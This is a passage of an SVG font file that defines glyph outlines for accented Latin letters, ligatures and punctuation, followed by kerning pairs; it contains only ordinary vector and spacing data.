<glyph unicode="&#xd3;" horiz-adv-x="1398" d="M103 597v262q0 266 163.5 442t424.5 176q267 0 435 -176t168 -442v-262q0 -267 -167.5 -442.5t-434.5 -175.5q-262 0 -425.5 175.5t-163.5 442.5zM345 597q0 -184 93 -301.5t254 -117.5q167 0 263.5 117t96.5 302v264q0 182 -97.5 299t-263.5 117q-160 0 -253 -117 t-93 -299v-264zM581 1580l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xd4;" horiz-adv-x="1398" d="M103 597v262q0 266 163.5 442t424.5 176q267 0 435 -176t168 -442v-262q0 -267 -167.5 -442.5t-434.5 -175.5q-262 0 -425.5 175.5t-163.5 442.5zM345 597q0 -184 93 -301.5t254 -117.5q167 0 263.5 117t96.5 302v264q0 182 -97.5 299t-263.5 117q-160 0 -253 -117 t-93 -299v-264zM364 1618v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193z" />
<glyph unicode="&#xd5;" horiz-adv-x="1398" d="M103 597v262q0 266 163.5 442t424.5 176q267 0 435 -176t168 -442v-262q0 -267 -167.5 -442.5t-434.5 -175.5q-262 0 -425.5 175.5t-163.5 442.5zM339 1658q0 94 59.5 163.5t149.5 69.5q56 0 145.5 -44.5t141.5 -44.5q38 0 66 32t28 78l131 -39q0 -95 -60 -162t-150 -67 q-71 0 -153.5 44.5t-133.5 44.5q-39 0 -66 -32.5t-27 -77.5zM345 597q0 -184 93 -301.5t254 -117.5q167 0 263.5 117t96.5 302v264q0 182 -97.5 299t-263.5 117q-160 0 -253 -117t-93 -299v-264z" />
<glyph unicode="&#xd6;" horiz-adv-x="1398" d="M103 597v262q0 266 163.5 442t424.5 176q267 0 435 -176t168 -442v-262q0 -267 -167.5 -442.5t-434.5 -175.5q-262 0 -425.5 175.5t-163.5 442.5zM337 1622v204h241v-204h-241zM345 597q0 -184 93 -301.5t254 -117.5q167 0 263.5 117t96.5 302v264q0 182 -97.5 299 t-263.5 117q-160 0 -253 -117t-93 -299v-264zM820 1622v204h242v-204h-242z" />
<glyph unicode="&#xd7;" horiz-adv-x="1092" d="M77 364l316 322l-316 322l148 150l315 -322l316 322l148 -150l-316 -322l316 -322l-148 -150l-316 321l-315 -321z" />
<glyph unicode="&#xd8;" horiz-adv-x="1403" d="M103 597v262q0 266 163.5 442t424.5 176q97 0 182.5 -25.5t158.5 -72.5l82 139h148l-131 -222q78 -84 120.5 -196.5t42.5 -240.5v-262q0 -267 -167.5 -442.5t-434.5 -175.5q-82 0 -155.5 18t-136.5 54l-86 -146h-148l130 221q-93 84 -143 206t-50 265zM345 597 q0 -79 17.5 -146.5t50.5 -114.5l6 -1l504 858q-47 40 -105 62t-127 22q-160 0 -253 -117t-93 -299v-264zM506 232q39 -27 86 -40.5t100 -13.5q167 0 263.5 117t96.5 302v264q0 61 -12 115.5t-33 96.5l-6 1z" />
<glyph unicode="&#xd9;" horiz-adv-x="1396" d="M134 480v976h243v-976q0 -153 86 -230t231 -77q150 0 239 77t89 230v976h243v-976q0 -242 -158 -371.5t-413 -129.5q-250 0 -405 130t-155 371zM359 1820l2 6h268l185 -266h-196z" />
<glyph unicode="&#xda;" horiz-adv-x="1396" d="M134 480v976h243v-976q0 -153 86 -230t231 -77q150 0 239 77t89 230v976h243v-976q0 -242 -158 -371.5t-413 -129.5q-250 0 -405 130t-155 371zM582 1559l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xdb;" horiz-adv-x="1396" d="M134 480v976h243v-976q0 -153 86 -230t231 -77q150 0 239 77t89 230v976h243v-976q0 -242 -158 -371.5t-413 -129.5q-250 0 -405 130t-155 371zM365 1597v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193z" />
<glyph unicode="&#xdc;" horiz-adv-x="1396" d="M134 480v976h243v-976q0 -153 86 -230t231 -77q150 0 239 77t89 230v976h243v-976q0 -242 -158 -371.5t-413 -129.5q-250 0 -405 130t-155 371zM338 1601v204h241v-204h-241zM821 1601v204h242v-204h-242z" />
<glyph unicode="&#xdd;" horiz-adv-x="1270" d="M13 1456h271l350 -708l352 708h271l-505 -945v-511h-242v524zM520 1559l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xde;" horiz-adv-x="1226" d="M148 0v1456h243v-280h246q242 0 377.5 -121.5t135.5 -316.5q0 -196 -135.5 -317t-377.5 -121h-246v-300h-243zM391 495h246q135 0 202.5 69.5t67.5 171.5q0 104 -67.5 174.5t-202.5 70.5h-246v-486z" />
<glyph unicode="&#xdf;" horiz-adv-x="1255" d="M136 0v1093q0 224 123 349t325 125q170 0 279.5 -91.5t109.5 -264.5q0 -113 -59 -216.5t-59 -165.5q0 -68 162 -210t162 -280q0 -180 -109 -270t-306 -90q-82 0 -166.5 17t-122.5 45l49 197q41 -25 102.5 -45t123.5 -20q93 0 140 41.5t47 112.5q0 76 -162.5 214.5 t-162.5 283.5q0 85 63 190t63 180q0 80 -47.5 128.5t-110.5 48.5q-91 0 -146.5 -74t-55.5 -207v-1091h-242z" />
<glyph unicode="&#xe0;" horiz-adv-x="1114" d="M82 305q0 157 124 244.5t349 87.5h189v95q0 85 -50 133t-143 48q-83 0 -132 -40t-49 -103h-234l-1 6q-7 128 114.5 227t316.5 99q189 0 305 -96t116 -276v-481q0 -67 9 -128.5t29 -120.5h-246q-13 41 -21.5 80t-11.5 78q-50 -76 -131.5 -127.5t-182.5 -51.5 q-169 0 -259.5 87t-90.5 239zM209 1498l2 6h268l185 -266h-196zM325 309q0 -62 40.5 -98.5t115.5 -36.5q92 0 165.5 46t97.5 105v160h-193q-106 0 -166 -52.5t-60 -123.5z" />
<glyph unicode="&#xe1;" horiz-adv-x="1114" d="M82 305q0 157 124 244.5t349 87.5h189v95q0 85 -50 133t-143 48q-83 0 -132 -40t-49 -103h-234l-1 6q-7 128 114.5 227t316.5 99q189 0 305 -96t116 -276v-481q0 -67 9 -128.5t29 -120.5h-246q-13 41 -21.5 80t-11.5 78q-50 -76 -131.5 -127.5t-182.5 -51.5 q-169 0 -259.5 87t-90.5 239zM325 309q0 -62 40.5 -98.5t115.5 -36.5q92 0 165.5 46t97.5 105v160h-193q-106 0 -166 -52.5t-60 -123.5zM432 1237l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xe2;" horiz-adv-x="1114" d="M82 305q0 157 124 244.5t349 87.5h189v95q0 85 -50 133t-143 48q-83 0 -132 -40t-49 -103h-234l-1 6q-7 128 114.5 227t316.5 99q189 0 305 -96t116 -276v-481q0 -67 9 -128.5t29 -120.5h-246q-13 41 -21.5 80t-11.5 78q-50 -76 -131.5 -127.5t-182.5 -51.5 q-169 0 -259.5 87t-90.5 239zM215 1275v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193zM325 309q0 -62 40.5 -98.5t115.5 -36.5q92 0 165.5 46t97.5 105v160h-193q-106 0 -166 -52.5t-60 -123.5z" />
<glyph unicode="&#xe3;" horiz-adv-x="1114" d="M82 305q0 157 124 244.5t349 87.5h189v95q0 85 -50 133t-143 48q-83 0 -132 -40t-49 -103h-234l-1 6q-7 128 114.5 227t316.5 99q189 0 305 -96t116 -276v-481q0 -67 9 -128.5t29 -120.5h-246q-13 41 -21.5 80t-11.5 78q-50 -76 -131.5 -127.5t-182.5 -51.5 q-169 0 -259.5 87t-90.5 239zM190 1315q0 94 59.5 163.5t149.5 69.5q56 0 145.5 -44.5t141.5 -44.5q38 0 66 32t28 78l131 -39q0 -95 -60 -162t-150 -67q-71 0 -153.5 44.5t-133.5 44.5q-39 0 -66 -32.5t-27 -77.5zM325 309q0 -62 40.5 -98.5t115.5 -36.5q92 0 165.5 46 t97.5 105v160h-193q-106 0 -166 -52.5t-60 -123.5z" />
<glyph unicode="&#xe4;" horiz-adv-x="1114" d="M82 305q0 157 124 244.5t349 87.5h189v95q0 85 -50 133t-143 48q-83 0 -132 -40t-49 -103h-234l-1 6q-7 128 114.5 227t316.5 99q189 0 305 -96t116 -276v-481q0 -67 9 -128.5t29 -120.5h-246q-13 41 -21.5 80t-11.5 78q-50 -76 -131.5 -127.5t-182.5 -51.5 q-169 0 -259.5 87t-90.5 239zM188 1279v204h241v-204h-241zM325 309q0 -62 40.5 -98.5t115.5 -36.5q92 0 165.5 46t97.5 105v160h-193q-106 0 -166 -52.5t-60 -123.5zM671 1279v204h242v-204h-242z" />
<glyph unicode="&#xe5;" horiz-adv-x="1114" d="M82 305q0 157 124 244.5t349 87.5h189v95q0 85 -50 133t-143 48q-83 0 -132 -40t-49 -103h-234l-1 6q-7 128 114.5 227t316.5 99q189 0 305 -96t116 -276v-481q0 -67 9 -128.5t29 -120.5h-246q-13 41 -21.5 80t-11.5 78q-50 -76 -131.5 -127.5t-182.5 -51.5 q-169 0 -259.5 87t-90.5 239zM325 309q0 -62 40.5 -98.5t115.5 -36.5q92 0 165.5 46t97.5 105v160h-193q-106 0 -166 -52.5t-60 -123.5zM339 1415q0 84 61.5 141t150.5 57q87 0 147.5 -57t60.5 -141q0 -85 -60.5 -139.5t-147.5 -54.5q-89 0 -150.5 54.5t-61.5 139.5z M449 1415q0 -43 29.5 -72t72.5 -29q42 0 70 28t28 73t-28 74.5t-70 30.5q-43 -1 -72.5 -30.5t-29.5 -74.5z" />
<glyph unicode="&#xe6;" horiz-adv-x="1729" d="M52 312q0 158 120.5 244t351.5 86h206v71q0 91 -46.5 142.5t-132.5 51.5q-93 0 -146.5 -45t-53.5 -110l-233 18l-2 6q-6 141 115 233.5t322 92.5q107 0 192.5 -33t141.5 -97q63 63 147 96.5t184 33.5q214 0 332 -131t118 -359v-141h-680l-3 -6q4 -131 74 -211.5 t209 -80.5q98 0 161 23t144 69l73 -165q-57 -45 -158 -83t-234 -38q-132 0 -234 44.5t-169 127.5q-59 -74 -166 -123t-256 -49q-180 0 -278.5 89.5t-98.5 243.5zM295 308q0 -65 45.5 -104.5t135.5 -39.5q67 0 140 36.5t114 85.5v189h-204q-109 0 -170 -49t-61 -118zM988 647 l2 -5h438v30q0 105 -51.5 170t-158.5 65q-104 0 -162 -71.5t-68 -188.5z" />
<glyph unicode="&#xe7;" horiz-adv-x="1075" d="M81 523v35q0 235 127.5 389.5t366.5 154.5q195 0 316.5 -113.5t117.5 -288.5l-2 -6h-221q0 89 -58.5 151t-152.5 62q-137 0 -194 -99.5t-57 -249.5v-35q0 -153 57 -251.5t194 -98.5q89 0 150 52.5t61 131.5h220l2 -6q5 -152 -123.5 -262t-309.5 -110q-239 0 -366.5 154 t-127.5 390zM427 -140l32 139h177l-11 -54q64 -11 107 -52t43 -121q0 -102 -85 -162.5t-242 -60.5l-7 137q62 0 99.5 22t37.5 67q0 44 -34.5 62t-116.5 23z" />
<glyph unicode="&#xe8;" horiz-adv-x="1084" d="M89 516v40q0 236 135.5 391.5t339.5 154.5q219 0 335.5 -132.5t116.5 -355.5v-143h-675l-2 -5q6 -129 75.5 -211t192.5 -82q98 0 168 24t135 69l78 -159q-61 -54 -162 -91t-234 -37q-230 0 -366.5 150.5t-136.5 386.5zM211 1499l2 6h268l185 -266h-196zM344 654l2 -5h429 v25q0 103 -52.5 168t-158.5 65q-90 0 -148 -71.5t-72 -181.5z" />
<glyph unicode="&#xe9;" horiz-adv-x="1084" d="M89 516v40q0 236 135.5 391.5t339.5 154.5q219 0 335.5 -132.5t116.5 -355.5v-143h-675l-2 -5q6 -129 75.5 -211t192.5 -82q98 0 168 24t135 69l78 -159q-61 -54 -162 -91t-234 -37q-230 0 -366.5 150.5t-136.5 386.5zM344 654l2 -5h429v25q0 103 -52.5 168t-158.5 65 q-90 0 -148 -71.5t-72 -181.5zM434 1238l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xea;" horiz-adv-x="1084" d="M89 516v40q0 236 135.5 391.5t339.5 154.5q219 0 335.5 -132.5t116.5 -355.5v-143h-675l-2 -5q6 -129 75.5 -211t192.5 -82q98 0 168 24t135 69l78 -159q-61 -54 -162 -91t-234 -37q-230 0 -366.5 150.5t-136.5 386.5zM217 1276v26l264 240h143l266 -242v-24h-195 l-143 139l-142 -139h-193zM344 654l2 -5h429v25q0 103 -52.5 168t-158.5 65q-90 0 -148 -71.5t-72 -181.5z" />
<glyph unicode="&#xeb;" horiz-adv-x="1084" d="M89 516v40q0 236 135.5 391.5t339.5 154.5q219 0 335.5 -132.5t116.5 -355.5v-143h-675l-2 -5q6 -129 75.5 -211t192.5 -82q98 0 168 24t135 69l78 -159q-61 -54 -162 -91t-234 -37q-230 0 -366.5 150.5t-136.5 386.5zM190 1280v204h241v-204h-241zM344 654l2 -5h429v25 q0 103 -52.5 168t-158.5 65q-90 0 -148 -71.5t-72 -181.5zM673 1280v204h242v-204h-242z" />
<glyph unicode="&#xec;" horiz-adv-x="538" d="M-74 1477l2 6h268l185 -266h-196zM143 0v1082h243v-1082h-243z" />
<glyph unicode="&#xed;" horiz-adv-x="538" d="M143 0v1082h243v-1082h-243zM147 1216l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xee;" horiz-adv-x="538" d="M-68 1254v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193zM143 0v1082h243v-1082h-243z" />
<glyph unicode="&#xef;" horiz-adv-x="538" d="M-95 1258v204h241v-204h-241zM143 0v1082h243v-1082h-243zM388 1258v204h242v-204h-242z" />
<glyph unicode="&#xf0;" horiz-adv-x="1210" d="M60 468q0 226 136.5 365.5t358.5 139.5q85 0 160.5 -31.5t127.5 -83.5l4 5q-12 94 -53 172.5t-105 138.5l-268 -150l-78 109l219 123v6q-33 17 -71.5 32t-77.5 27l75 196q84 -19 160 -52.5t142 -79.5l207 116l78 -109l-178 -100q98 -105 151.5 -243t53.5 -301v-207 q0 -248 -150 -405t-375 -157q-227 0 -372 140.5t-145 348.5zM303 468q0 -121 75.5 -208t202.5 -87q125 0 201.5 104t76.5 264v132q-35 48 -107.5 80t-175.5 32q-126 0 -199.5 -90t-73.5 -227z" />
<glyph unicode="&#xf1;" d="M126 0v1082h222l14 -156q53 83 133.5 129.5t181.5 46.5q169 0 263.5 -102.5t94.5 -319.5v-680h-243v678q0 122 -50.5 173.5t-153.5 51.5q-71 0 -127 -31.5t-92 -86.5v-785h-243zM217 1315q0 94 59.5 163.5t149.5 69.5q56 0 145.5 -44.5t141.5 -44.5q38 0 66 32t28 78 l131 -39q0 -95 -60 -162t-150 -67q-71 0 -153.5 44.5t-133.5 44.5q-39 0 -66 -32.5t-27 -77.5z" />
<glyph unicode="&#xf2;" d="M83 530v21q0 241 132 396q134 155 363 155q233 0 365 -155q133 -154 133 -396v-21q0 -244 -133 -398q-132 -153 -363 -153q-232 0 -365 154q-132 154 -132 397zM238 1498l2 6h268l185 -266h-196zM326 530q0 -158 62 -258q61 -99 192 -99q127 0 190 99q64 100 64 258v21 q0 155 -64 255q-63 101 -192 101q-127 0 -190 -101q-62 -101 -62 -255v-21z" />
<glyph unicode="&#xf3;" d="M83 530v21q0 241 132 396q134 155 363 155q233 0 365 -155q133 -154 133 -396v-21q0 -244 -133 -398q-132 -153 -363 -153q-232 0 -365 154q-132 154 -132 397zM326 530q0 -158 62 -258q61 -99 192 -99q127 0 190 99q64 100 64 258v21q0 155 -64 255q-63 101 -192 101 q-127 0 -190 -101q-62 -101 -62 -255v-21zM461 1237l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xf4;" d="M83 530v21q0 241 132 396q134 155 363 155q233 0 365 -155q133 -154 133 -396v-21q0 -244 -133 -398q-132 -153 -363 -153q-232 0 -365 154q-132 154 -132 397zM244 1275v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193zM326 530q0 -158 62 -258 q61 -99 192 -99q127 0 190 99q64 100 64 258v21q0 155 -64 255q-63 101 -192 101q-127 0 -190 -101q-62 -101 -62 -255v-21z" />
<glyph unicode="&#xf5;" d="M83 530v21q0 241 132 396q134 155 363 155q233 0 365 -155q133 -154 133 -396v-21q0 -244 -133 -398q-132 -153 -363 -153q-232 0 -365 154q-132 154 -132 397zM219 1315q0 94 59.5 163.5t149.5 69.5q56 0 145.5 -44.5t141.5 -44.5q38 0 66 32t28 78l131 -39 q0 -95 -60 -162t-150 -67q-71 0 -153.5 44.5t-133.5 44.5q-39 0 -66 -32.5t-27 -77.5zM326 530q0 -158 62 -258q61 -99 192 -99q127 0 190 99q64 100 64 258v21q0 155 -64 255q-63 101 -192 101q-127 0 -190 -101q-62 -101 -62 -255v-21z" />
<glyph unicode="&#xf6;" d="M83 530v21q0 241 132 396q134 155 363 155q233 0 365 -155q133 -154 133 -396v-21q0 -244 -133 -398q-132 -153 -363 -153q-232 0 -365 154q-132 154 -132 397zM217 1279v204h241v-204h-241zM326 530q0 -158 62 -258q61 -99 192 -99q127 0 190 99q64 100 64 258v21 q0 155 -64 255q-63 101 -192 101q-127 0 -190 -101q-62 -101 -62 -255v-21zM700 1279v204h242v-204h-242z" />
<glyph unicode="&#xf7;" horiz-adv-x="1169" d="M67 582v212h1012v-212h-1012zM453 170v221h243v-221h-243zM453 985v221h243v-221h-243z" />
<glyph unicode="&#xf8;" horiz-adv-x="1161" d="M83 530v21q0 242 132.5 396.5t362.5 154.5q53 0 102.5 -9.5t94.5 -26.5l72 146h144l-104 -211q91 -74 140 -190.5t49 -259.5v-21q0 -244 -132.5 -397.5t-363.5 -153.5q-48 0 -93 7.5t-87 21.5l-72 -146h-144l102 207q-99 71 -151 191t-52 270zM326 530q0 -78 14.5 -142 t44.5 -104l6 -1l294 600q-24 11 -50.5 17.5t-56.5 6.5q-127 0 -189.5 -100.5t-62.5 -255.5v-21zM489 189q20 -8 43 -12t48 -4q127 0 190.5 99.5t63.5 257.5v21q0 68 -13 127t-37 100l-6 1z" />
<glyph unicode="&#xf9;" d="M123 435v647h242v-649q0 -142 46 -199t139 -57q88 0 147.5 31.5t93.5 91.5v782h243v-1082h-212l-20 158q-51 -86 -129 -132.5t-180 -46.5q-174 0 -272 111t-98 345zM237 1477l2 6h268l185 -266h-196z" />
<glyph unicode="&#xfa;" d="M123 435v647h242v-649q0 -142 46 -199t139 -57q88 0 147.5 31.5t93.5 91.5v782h243v-1082h-212l-20 158q-51 -86 -129 -132.5t-180 -46.5q-174 0 -272 111t-98 345zM460 1216l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xfb;" d="M123 435v647h242v-649q0 -142 46 -199t139 -57q88 0 147.5 31.5t93.5 91.5v782h243v-1082h-212l-20 158q-51 -86 -129 -132.5t-180 -46.5q-174 0 -272 111t-98 345zM243 1254v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193z" />
<glyph unicode="&#xfc;" d="M123 435v647h242v-649q0 -142 46 -199t139 -57q88 0 147.5 31.5t93.5 91.5v782h243v-1082h-212l-20 158q-51 -86 -129 -132.5t-180 -46.5q-174 0 -272 111t-98 345zM216 1258v204h241v-204h-241zM699 1258v204h242v-204h-242z" />
<glyph unicode="&#xfd;" horiz-adv-x="1038" d="M16 1082h265l206 -648l24 -108h6l237 756h266l-448 -1246q-43 -113 -121 -193t-221 -80q-30 0 -64.5 6t-66.5 14l27 188q13 -1 37 -3t36 -2q66 0 105.5 45t64.5 104l40 98zM400 1216l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xfe;" horiz-adv-x="1175" d="M138 -416v1976h243v-595q50 66 120.5 101.5t161.5 35.5q200 0 311.5 -158.5t111.5 -417.5v-21q0 -236 -111 -381t-309 -145q-92 0 -163 33t-122 97v-525h-243zM381 291q32 -57 85 -87.5t131 -30.5q124 0 185.5 91.5t61.5 240.5v21q0 166 -62.5 271.5t-186.5 105.5 q-76 0 -129 -32.5t-85 -90.5v-489z" />
<glyph unicode="&#xff;" horiz-adv-x="1038" d="M16 1082h265l206 -648l24 -108h6l237 756h266l-448 -1246q-43 -113 -121 -193t-221 -80q-30 0 -64.5 6t-66.5 14l27 188q13 -1 37 -3t36 -2q66 0 105.5 45t64.5 104l40 98zM158 1258v204h241v-204h-241zM641 1258v204h242v-204h-242z" />
<glyph unicode="&#x152;" horiz-adv-x="1972" d="M101 576v304q0 265 160.5 431t419.5 166q69 0 140 -6t150 -15h888v-195h-732v-411h637v-195h-637v-461h739v-194h-895q-92 -10 -156.5 -15.5t-131.5 -5.5q-260 0 -421 165.5t-161 431.5zM343 576q0 -196 90 -299t250 -103q51 0 101.5 3.5t99.5 10.5v1080q-53 6 -103.5 10 t-99.5 4q-159 0 -248.5 -102.5t-89.5 -297.5v-306z" />
<glyph unicode="&#x153;" horiz-adv-x="1851" d="M83 530v21q0 242 132.5 396.5t362.5 154.5q129 0 229.5 -50.5t165.5 -141.5q64 91 160 141.5t209 50.5q219 0 335.5 -132.5t116.5 -355.5v-143h-675l-2 -5q6 -129 75.5 -211t192.5 -82q98 0 168 24t135 69l78 -159q-61 -54 -162 -91t-234 -37q-129 0 -231 49.5 t-167 139.5q-65 -91 -164.5 -140t-227.5 -49q-232 0 -364.5 154t-132.5 397zM326 530q0 -159 62 -258t192 -99q127 0 190.5 99.5t63.5 257.5v21q0 155 -63.5 255.5t-192.5 100.5q-127 0 -189.5 -100.5t-62.5 -255.5v-21zM1122 654l2 -5h429v25q0 103 -52.5 168t-158.5 65 q-90 0 -148 -71.5t-72 -181.5z" />
<glyph unicode="&#x178;" horiz-adv-x="1270" d="M13 1456h271l350 -708l352 708h271l-505 -945v-511h-242v524zM276 1601v204h241v-204h-241zM759 1601v204h242v-204h-242z" />
<glyph unicode="&#x2c6;" horiz-adv-x="998" d="M155 1252v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193z" />
<glyph unicode="&#x2dc;" horiz-adv-x="984" d="M128 1273q0 94 59.5 163.5t149.5 69.5q56 0 145.5 -44.5t141.5 -44.5q38 0 66 32t28 78l131 -39q0 -95 -60 -162t-150 -67q-71 0 -153.5 44.5t-133.5 44.5q-39 0 -66 -32.5t-27 -77.5z" />
<glyph unicode="&#x2000;" horiz-adv-x="967" />
<glyph unicode="&#x2001;" horiz-adv-x="1935" />
<glyph unicode="&#x2002;" horiz-adv-x="967" />
<glyph unicode="&#x2003;" horiz-adv-x="1935" />
<glyph unicode="&#x2004;" horiz-adv-x="645" />
<glyph unicode="&#x2005;" horiz-adv-x="483" />
<glyph unicode="&#x2006;" horiz-adv-x="322" />
<glyph unicode="&#x2007;" horiz-adv-x="322" />
<glyph unicode="&#x2008;" horiz-adv-x="241" />
<glyph unicode="&#x2009;" horiz-adv-x="387" />
<glyph unicode="&#x200a;" horiz-adv-x="107" />
<glyph unicode="&#x2010;" horiz-adv-x="672" d="M71 521v196h525v-196h-525z" />
<glyph unicode="&#x2011;" horiz-adv-x="672" d="M71 521v196h525v-196h-525z" />
<glyph unicode="&#x2012;" horiz-adv-x="672" d="M71 521v196h525v-196h-525z" />
<glyph unicode="&#x2013;" horiz-adv-x="1415" d="M156 621v196h1086v-196h-1086z" />
<glyph unicode="&#x2014;" horiz-adv-x="1665" d="M125 621v196h1336v-196h-1336z" />
<glyph unicode="&#x2018;" horiz-adv-x="413" d="M66 1015v188l162 357h119l-60 -358v-187h-221z" />
<glyph unicode="&#x2019;" horiz-adv-x="413" d="M69 1016l60 348v196h221v-194l-162 -350h-119z" />
<glyph unicode="&#x201a;" horiz-adv-x="413" d="M66 -262l60 265v266h221v-249l-155 -282h-126z" />
<glyph unicode="&#x201c;" horiz-adv-x="746" d="M66 1015v188l162 357h119l-60 -358v-187h-221zM395 1015v188l162 357h119l-60 -358v-187h-221z" />
<glyph unicode="&#x201d;" horiz-adv-x="754" d="M69 1016l60 348v196h221v-194l-162 -350h-119zM406 1016l60 348v196h221v-194l-162 -350h-119z" />
<glyph unicode="&#x201e;" horiz-adv-x="731" d="M66 -233l60 295v228h214v-217l-162 -306h-112zM391 -233l60 303v220h214v-217l-162 -306h-112z" />
<glyph unicode="&#x2022;" horiz-adv-x="715" d="M136 724v77q0 94 60 154.5t161 60.5q102 0 162.5 -60t60.5 -155v-77q0 -96 -60 -154.5t-162 -58.5q-101 0 -161.5 59t-60.5 154z" />
<glyph unicode="&#x2026;" horiz-adv-x="1446" d="M153 0v233h242v-233h-242zM596 0v233h242v-233h-242zM1016 0v233h242v-233h-242z" />
<glyph unicode="&#x202f;" horiz-adv-x="387" />
<glyph unicode="&#x2039;" horiz-adv-x="626" d="M108 541v19l288 390h167l-247 -400l247 -399h-167z" />
<glyph unicode="&#x203a;" horiz-adv-x="617" d="M84 151l247 399l-247 400h167l288 -390v-19l-288 -390h-167z" />
<glyph unicode="&#x205f;" horiz-adv-x="483" />
<glyph unicode="&#x20ac;" horiz-adv-x="1101" d="M75 457v195h146v128h-146v195h146v12q0 198 145.5 344t382.5 146q60 0 118 -8t125 -23l-20 -199q-54 16 -110.5 25.5t-112.5 9.5q-132 0 -208.5 -89.5t-76.5 -203.5v-14h460v-195h-460v-128h460v-195h-460v-2q0 -112 77 -197t210 -85q57 0 113 8.5t108 25.5l20 -197 q-56 -15 -117.5 -23t-123.5 -8q-237 0 -383.5 141.5t-146.5 334.5v2h-146z" />
<glyph unicode="&#x2122;" horiz-adv-x="1289" d="M100 1361v95h391v-95h-138v-443h-117v443h-136zM565 916v540h137l141 -373h6l142 373h131v-540h-110v317l-6 1l-129 -318h-61l-134 330l-6 -1v-329h-111z" />
<glyph unicode="&#xe000;" horiz-adv-x="1080" d="M0 0v1080h1080v-1080h-1080z" />
<glyph unicode="&#xfb02;" horiz-adv-x="1250" d="M42 902v180h165v126q0 179 97.5 276t273.5 97q35 0 71 -5.5t81 -15.5l-25 -188q-20 4 -44.5 7t-52.5 3q-79 0 -118.5 -45t-39.5 -129v-126h220v-180h-220v-902h-243v902h-165zM863 0v1560h243v-1560h-243z" />
<glyph unicode="&#xfb03;" horiz-adv-x="1911" d="M42 902v180h165v126q0 179 97.5 276t273.5 97q35 0 71 -5.5t81 -15.5l-25 -188q-20 4 -44.5 7t-52.5 3q-79 0 -118.5 -45t-39.5 -129v-126h220v-180h-220v-902h-243v902h-165zM743 902v180h165v92q0 195 115 301t322 106q72 0 143 -15.5t163 -44.5l-37 -201 q-62 21 -122 34.5t-130 13.5q-109 0 -160 -48.5t-51 -145.5v-92h213v-180h-213v-902h-243v902h-165zM1523 0v1082h243v-1082h-243z" />
<glyph unicode="&#xfb04;" horiz-adv-x="1969" d="M42 902v180h165v126q0 179 97.5 276t273.5 97q35 0 71 -5.5t81 -15.5l-25 -188q-20 4 -44.5 7t-52.5 3q-79 0 -118.5 -45t-39.5 -129v-126h220v-180h-220v-902h-243v902h-165zM761 902v180h165v126q0 179 97.5 276t273.5 97q35 0 71 -5.5t81 -15.5l-25 -188 q-20 4 -44.5 7t-52.5 3q-79 0 -118.5 -45t-39.5 -129v-126h220v-180h-220v-902h-243v902h-165zM1582 0v1560h243v-1560h-243z" />
<hkern u1="&#x22;" u2="w" k="-11" />
<hkern u1="&#x27;" u2="w" k="-11" />
<hkern u1="&#x28;" u2="&#x178;" k="-23" />
<hkern u1="&#x28;" u2="&#xdd;" k="-23" />
<hkern u1="&#x28;" u2="Y" k="-23" />
<hkern u1="&#x28;" u2="W" k="-32" />
<hkern u1="&#x28;" u2="V" k="-21" />
<hkern u1="A" u2="w" k="35" />
<hkern u1="A" u2="t" k="18" />
<hkern u1="A" u2="&#x3f;" k="79" />
<hkern u1="C" u2="&#x29;" k="28" />
<hkern u1="D" u2="&#xc6;" k="46" />
<hkern u1="E" u2="w" k="23" />
<hkern u1="F" u2="&#x2026;" k="297" />
<hkern u1="F" u2="&#x201e;" k="297" />
<hkern u1="F" u2="&#x201a;" k="297" />
<hkern u1="F" u2="&#x153;" k="35" />
<hkern u1="F" u2="&#xff;" k="26" />
<hkern u1="F" u2="&#xfd;" k="26" />
<hkern u1="F" u2="&#xfc;" k="23" />
<hkern u1="F" u2="&#xfb;" k="23" />
<hkern u1="F" u2="&#xfa;" k="23" />
<hkern u1="F" u2="&#xf9;" k="23" />
<hkern u1="F" u2="&#xf6;" k="36" />
<hkern u1="F" u2="&#xf5;" k="36" />
<hkern u1="F" u2="&#xf4;" k="36" />
<hkern u1="F" u2="&#xf3;" k="36" />
<hkern u1="F" u2="&#xf2;" k="36" />
<hkern u1="F" u2="&#xeb;" k="35" />
<hkern u1="F" u2="&#xea;" k="35" />
<hkern u1="F" u2="&#xe9;" k="35" />
<hkern u1="F" u2="&#xe8;" k="35" />
<hkern u1="F" u2="&#xe7;" k="35" />
<hkern u1="F" u2="&#xe5;" k="50" />
<hkern u1="F" u2="&#xe4;" k="50" />
<hkern u1="F" u2="&#xe3;" k="50" />
<hkern u1="F" u2="&#xe2;" k="50" />
<hkern u1="F" u2="&#xe1;" k="50" />
<hkern u1="F" u2="&#xe0;" k="50" />
<hkern u1="F" u2="&#xc5;" k="107" />
<hkern u1="F" u2="&#xc4;" k="107" />
<hkern u1="F" u2="&#xc3;" k="107" />
<hkern u1="F" u2="&#xc2;" k="107" />
<hkern u1="F" u2="&#xc1;" k="107" />
<hkern u1="F" u2="&#xc0;" k="107" />
<hkern u1="F" u2="y" k="26" />
<hkern u1="F" u2="v" k="26" />
<hkern u1="F" u2="u" k="23" />
<hkern u1="F" u2="r" k="28" />
<hkern u1="F" u2="q" k="35" />
<hkern u1="F" u2="o" k="36" />
<hkern u1="F" u2="g" k="35" />
<hkern u1="F" u2="e" k="35" />
<hkern u1="F" u2="d" k="35" />
<hkern u1="F" u2="c" k="35" />
<hkern u1="F" u2="a" k="50" />
<hkern u1="F" u2="T" k="-20" />
<hkern u1="F" u2="A" k="107" />
<hkern u1="F" u2="&#x3a;" k="297" />
<hkern u1="F" u2="&#x2e;" k="297" />
<hkern u1="F" u2="&#x2c;" k="297" />
<hkern u1="K" u2="w" k="68" />
